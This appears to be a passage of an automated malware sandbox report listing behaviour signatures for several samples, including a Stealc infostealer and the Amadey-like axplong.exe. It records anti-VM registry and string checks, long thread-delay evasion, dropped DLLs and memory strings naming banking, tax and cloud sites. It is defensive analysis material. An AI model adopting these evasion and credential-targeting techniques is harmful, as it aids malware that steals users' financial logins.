                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05400E16 rdtsc 0_2_05400E16
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeThread delayed: delay time: 180000
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 2259Jump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 913Jump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 650Jump to behavior
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeWindow / User API: threadDelayed 1962
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeWindow / User API: threadDelayed 1804
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 2687
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeWindow / User API: threadDelayed 2279
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeWindow / User API: threadDelayed 2906
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exeWindow / User API: threadDelayed 636
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Fido Video Recorder\ssleay32.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\neon[1].exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Fido Video Recorder\is-8M782.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-FGF43.tmp\_isetup\_setup64.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Fido Video Recorder\libssl-1_1.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Fido Video Recorder\is-S5HN7.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Fido Video Recorder\is-65AJA.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Fido Video Recorder\uninstall\is-4OQD3.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000355001\2a8f2f9086.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Fido Video Recorder\is-NSLMU.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Fido Video Recorder\msvcr71.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-FGF43.tmp\_isetup\_shfoldr.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Fido Video Recorder\msvcp71.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Fido Video Recorder\libeay32.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-FGF43.tmp\_isetup\_iscrypt.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Fido Video Recorder\is-AMTS2.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000356001\neon.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Fido Video Recorder\Qt5OpenGL.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Fido Video Recorder\is-0DA5B.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000354001\c9a37ab27e.exeJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Fido Video Recorder\uninstall\unins000.exe (copy)Jump to dropped file
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 9.8 %
                                  Source: C:\Users\user\AppData\Roaming\qKLAD7yUjj.exeAPI coverage: 9.4 %
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeAPI coverage: 3.4 %
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeAPI coverage: 1.4 %
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6476Thread sleep count: 38 > 30Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6476Thread sleep time: -76038s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6460Thread sleep count: 149 > 30Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6460Thread sleep time: -298149s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1848Thread sleep count: 177 > 30Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1848Thread sleep time: -5310000s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5252Thread sleep count: 129 > 30Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5252Thread sleep time: -258129s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6544Thread sleep count: 2259 > 30Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6544Thread sleep time: -4520259s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6204Thread sleep count: 156 > 30Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6204Thread sleep time: -312156s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3780Thread sleep time: -540000s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1848Thread sleep time: -30000s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe TID: 6800Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5684Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6716Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe TID: 4676Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe TID: 5888Thread sleep time: -11068046444225724s >= -30000s
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe TID: 2636Thread sleep count: 1962 > 30
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe TID: 2636Thread sleep count: 1804 > 30
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe TID: 2252Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe TID: 3192Thread sleep count: 245 > 30
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe TID: 3192Thread sleep time: -7350000s >= -30000s
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe TID: 2436Thread sleep time: -540000s >= -30000s
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe TID: 3192Thread sleep time: -30000s >= -30000s
                                  Source: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exe TID: 5804Thread sleep time: -42000s >= -30000s
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe TID: 2968Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\svchost.exe TID: 764Thread sleep time: -30000s >= -30000s
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe TID: 5940Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6324Thread sleep time: -6456360425798339s >= -30000s
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6576Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Users\user\AppData\Local\Temp\svchost015.exe TID: 6640Thread sleep count: 42 > 30
                                  Source: C:\Users\user\AppData\Local\Temp\svchost015.exe TID: 6640Thread sleep time: -252000s >= -30000s
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe TID: 5052Thread sleep time: -19369081277395017s >= -30000s
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe TID: 4292Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe TID: 5576Thread sleep count: 636 > 30
                                  Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe TID: 1880Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3928Thread sleep time: -30000s >= -30000s
                                  Source: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exeFile opened: PhysicalDrive0
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : Select Name from Win32_Processor
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeLast function: Thread delayed
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeLast function: Thread delayed
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeLast function: Thread delayed
                                  Source: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exeLast function: Thread delayed
                                  Source: C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041B6EA FindFirstFileExW,13_2_0041B6EA
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeCode function: 16_2_001CD9FD FindFirstFileExW,16_2_001CD9FD
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeCode function: 17_2_0024D9FD FindFirstFileExW,17_2_0024D9FD
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeCode function: 16_2_00197C40 GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,16_2_00197C40
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 30000Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 30000Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeThread delayed: delay time: 30000
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeThread delayed: delay time: 180000
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeThread delayed: delay time: 30000
                                  Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeFile opened: C:\Users\user\Documents\desktop.ini
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeFile opened: C:\Users\user
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeFile opened: C:\Users\user\AppData\Local\Temp
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeFile opened: C:\Users\user\AppData
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeFile opened: C:\Users\user\AppData\Local
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeFile opened: C:\Users\user\Desktop\desktop.ini
                                  Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                                  Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                                  Source: needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: ParallelsVirtualMachine
                                  Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                                  Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                                  Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                                  Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                                  Source: needmoney.exe, 00000016.00000000.2833755640.0000000000401000.00000020.00000001.01000000.00000017.sdmpBinary or memory string: QEMUU
                                  Source: penis.exe, 00000018.00000002.2884267791.0000000003030000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \qemu-ga.exe@\]q
                                  Source: Hkbsse.exe, 00000012.00000002.3336638317.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000012.00000002.3336638317.00000000007C7000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.2994583849.00000000007CF000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.2994583849.0000000000805000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.3345341880.0000019DEAC54000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.3339769594.0000019DE562B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.3339911557.0000019DE5640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                  Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                                  Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                                  Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                                  Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                                  Source: svchost015.exe, 00000020.00000002.3006538986.0000000000ACF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0S
                                  Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                                  Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                                  Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                                  Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                                  Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                                  Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                                  Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                                  Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                                  Source: penis.exe, 00000018.00000002.2884267791.0000000003030000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \qemu-ga.exe
                                  Source: stealc_default2.exe, 00000013.00000002.2994583849.000000000079E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                                  Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                                  Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                                  Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                                  Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                                  Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                                  Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                                  Source: axplong.exe, axplong.exe, 00000003.00000002.2137659091.00000000008DE000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                                  Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                                  Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                                  Source: file.exe, 00000000.00000003.2072201170.0000000001582000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                  Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                                  Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                                  Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                                  Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                                  Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                                  Source: RegAsm.exe, 0000000D.00000002.2745824214.0000000001625000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&22
                                  Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                                  Source: RegAsm.exe, 0000001F.00000002.3109509336.000000000303C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                                  Source: RegAsm.exe, 0000001F.00000002.3197749021.0000000003B30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
